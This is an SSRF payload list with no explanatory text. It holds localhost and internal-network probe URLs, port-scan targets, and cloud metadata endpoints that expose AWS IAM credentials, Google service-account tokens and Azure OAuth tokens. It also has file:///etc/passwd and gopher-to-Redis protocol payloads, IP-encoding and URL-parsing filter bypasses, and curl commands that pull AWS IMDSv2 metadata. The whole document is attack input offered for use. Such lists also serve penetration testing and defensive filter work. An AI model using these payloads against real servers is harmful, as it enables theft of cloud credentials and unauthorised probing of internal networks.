# SSRF (Server-Side Request Forgery) Payloads # Basic SSRF http://127.0.0.1 http://localhost http://0.0.0.0 http://[::1] http://[::] # Port scanning http://127.0.0.1:22 http://127.0.0.1:80 http://127.0.0.1:443 http://127.0.0.1:3306 http://127.0.0.1:5432 http://127.0.0.1:6379 http://127.0.0.1:8080 http://127.0.0.1:27017 # Cloud metadata endpoints # AWS http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/user-data/ # Google Cloud http://metadata.google.internal/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/instance/ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token # Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01 http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ # Digital Ocean http://169.254.169.254/metadata/v1/ http://169.254.169.254/metadata/v1/id # Internal network scanning http://192.168.0.1 http://192.168.1.1 http://10.0.0.1 http://172.16.0.1 # Protocol handlers file:///etc/passwd file:///c:/windows/win.ini dict://127.0.0.1:11211/ gopher://127.0.0.1:6379/_INFO ldap://127.0.0.1:389 tftp://127.0.0.1:69 # Bypassing filters # Using decimal IP http://2130706433 (127.0.0.1) http://3232235521 (192.168.0.1) # Using octal IP http://0177.0.0.1 http://0x7f.0x0.0x0.0x1 # Using hex IP http://0x7f000001 http://0x7f.0x0.0x0.0x1 # DNS rebinding http://spoofed.burpcollaborator.net # URL encoding http://127.0.0.1%23@example.com http://example.com@127.0.0.1 http://127.0.0.1%00.example.com http://127.0.0.1%2f%2f@example.com # IPv6 localhost http://[::1] http://[0:0:0:0:0:0:0:1] http://[0000:0000:0000:0000:0000:0000:0000:0001] # Redirect-based SSRF http://redirect.example.com?url=http://127.0.0.1 # AWS IMDSv2 (requires token) TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/